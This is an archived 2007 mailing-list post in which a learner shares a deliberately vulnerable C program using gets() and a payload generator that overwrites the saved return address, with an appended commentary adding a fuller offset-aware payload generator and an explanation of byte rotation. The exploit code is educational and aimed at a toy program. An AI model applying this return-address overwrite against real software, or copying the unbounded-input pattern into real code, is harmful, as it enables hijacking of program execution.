Re: Re: Controlling the eip

From: wymerzp@sbu.edu
Date: Wed May 16 2007 - 00:10:59 EDT


Hello all, thank you for your responses!
I finally figured out the problem. It was rather interesting so I figured that I would share in more detail.
Firstly the "program" to be exploited:
****************************************
#include <stdio.h>

/* Deliberately vulnerable: gets() has no bound, so more than 30 bytes of
 * input runs past array[] into the saved frame pointer and return address. */
void return_input(void){
        char array[30];
        gets (array);
        printf("%s\n", array);
}
int main(void)
{
   return_input();
   return 0;
}
********************************************
Secondly the new code to produce the ASCII characters of the address to be jumped to:
********************************************
#include <stdio.h>

int main(void)
{
    int i=0;
    /* 40 payload bytes plus one byte for the NUL terminator puts() needs;
     * without it puts() would read past the end of the array. */
    char stuffing[41];
    /* Write the (byte-rotated) address at every 4-byte stride: 0, 4, ..., 36. */
    for (i=0; i<=36; i+=4)
    *(long *) &stuffing[i] = 0x84050804;
    stuffing[40] = '\0';
    puts(stuffing);
    return 0;
}
********************************************
The interesting thing is that the address being placed in stuffing is not the address that I would like to jump to; that is 0x08048405. The reason for this is the buffer size. When I disassembled the function it had a buffer size of 0x24 (in the book it was 0x20); 0x24 in decimal is 36. So, when I was writing to the EIP I was putting the last half of the address onto the EIP 4 bytes (I believe, it's been a while since Computer Organization) and then the second half. This is because 36 is not cleanly divisible by 8 (i.e. 8 % 36 != 0). I, in my relative 'n00b-ness', found this rather interesting and was elated when I found out the source of my troubles.
Thanks for all who responded!
~Peace,
Zach
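A worked illustration of the alignment effect Zach describes, added here as an example and not part of the original post. The payload length (44) and the offset of the saved return address within the overflowed buffer (38, which is 2 mod 4) are assumptions chosen to reproduce the rotation; the target address 0x08048405 is the one from the post. The code shows that filling the payload with the address at 4-byte strides from the start delivers the byte-rotated value 0x84050804 to EIP when the return address sits at an offset that is not a multiple of 4, and that padding up to the measured offset and writing the address there avoids having to pre-rotate it. It also checks the payload for bytes that gets() or puts() would cut off.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumptions for this example (not from the post): the payload is 44 bytes
 * and the saved return address starts 38 bytes into the overflowed buffer.
 * 38 is 2 mod 4, which is exactly the situation that makes a 4-byte-stride
 * fill land a rotated address on EIP. */
#define PAYLOAD_LEN  44
#define RET_OFFSET   38
#define TARGET_ADDR  0x08048405u   /* the address the post wants to jump to */

/* Little-endian 32-bit load at byte offset off: what a 32-bit x86 CPU reads
 * when it pops the saved return address from that position. */
static uint32_t le32_at(const uint8_t *buf, size_t off)
{
    return (uint32_t)buf[off]
         | ((uint32_t)buf[off + 1] << 8)
         | ((uint32_t)buf[off + 2] << 16)
         | ((uint32_t)buf[off + 3] << 24);
}

static void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)v;
    dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16);
    dst[3] = (uint8_t)(v >> 24);
}

/* The fill from the post: addr at every 4-byte stride from the start of the
 * payload, with no regard for where the return address actually sits. */
static void fill_naive(uint8_t *out, size_t len, uint32_t addr)
{
    for (size_t i = 0; i + 4 <= len; i += 4)
        put_le32(out + i, addr);
}

/* Offset-aware fill: pad up to ret_off, then write addr starting exactly at
 * ret_off and repeat it to the end, so the bytes line up regardless of what
 * ret_off is mod 4. */
static void fill_at_offset(uint8_t *out, size_t len, size_t ret_off,
                           uint32_t addr, uint8_t pad)
{
    memset(out, pad, len);
    for (size_t i = ret_off; i + 4 <= len; i += 4)
        put_le32(out + i, addr);
}

/* gets() stops reading at '\n' (0x0a), and a generator that emits the payload
 * with puts()/printf() stops at NUL; return the index of the first such byte,
 * or -1 if the payload survives the trip intact. */
static long first_bad_byte(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x0a || buf[i] == 0x00)
            return (long)i;
    return -1;
}

/* What EIP receives with the naive fill, for a given return-address offset. */
static uint32_t eip_after_naive_fill(size_t ret_off)
{
    uint8_t buf[PAYLOAD_LEN];
    if (ret_off + 4 > sizeof buf)
        return 0;
    fill_naive(buf, sizeof buf, TARGET_ADDR);
    return le32_at(buf, ret_off);
}

/* What EIP receives with the offset-aware fill. */
static uint32_t eip_after_offset_fill(size_t ret_off)
{
    uint8_t buf[PAYLOAD_LEN];
    if (ret_off + 4 > sizeof buf)
        return 0;
    fill_at_offset(buf, sizeof buf, ret_off, TARGET_ADDR, 0x41);
    return le32_at(buf, ret_off);
}

static long offset_payload_bad_byte(size_t ret_off)
{
    uint8_t buf[PAYLOAD_LEN];
    fill_at_offset(buf, sizeof buf, ret_off, TARGET_ADDR, 0x41);
    return first_bad_byte(buf, sizeof buf);
}

/* Stand-alone use: emit the offset-aware payload on stdout, e.g. ./gen | ./vuln
 * fwrite() is used instead of puts() so no NUL terminator is needed. */
int main(void)
{
    uint8_t buf[PAYLOAD_LEN];
    fill_at_offset(buf, sizeof buf, RET_OFFSET, TARGET_ADDR, 0x41);
    if (first_bad_byte(buf, sizeof buf) >= 0)
        return 1;
    fwrite(buf, 1, sizeof buf, stdout);
    fputc('\n', stdout);
    return 0;
}
```

With the return address at offset 38, the naive fill puts bytes 04 08 05 84 where the CPU loads the saved EIP, which reads back as 0x84050804; the same fill at an offset that is a multiple of 4 yields 0x08048405 unchanged. That is why pre-rotating the constant to 0x84050804 works in the post, and why measuring the offset in the debugger and padding to it is the more general fix.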




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:47 EDT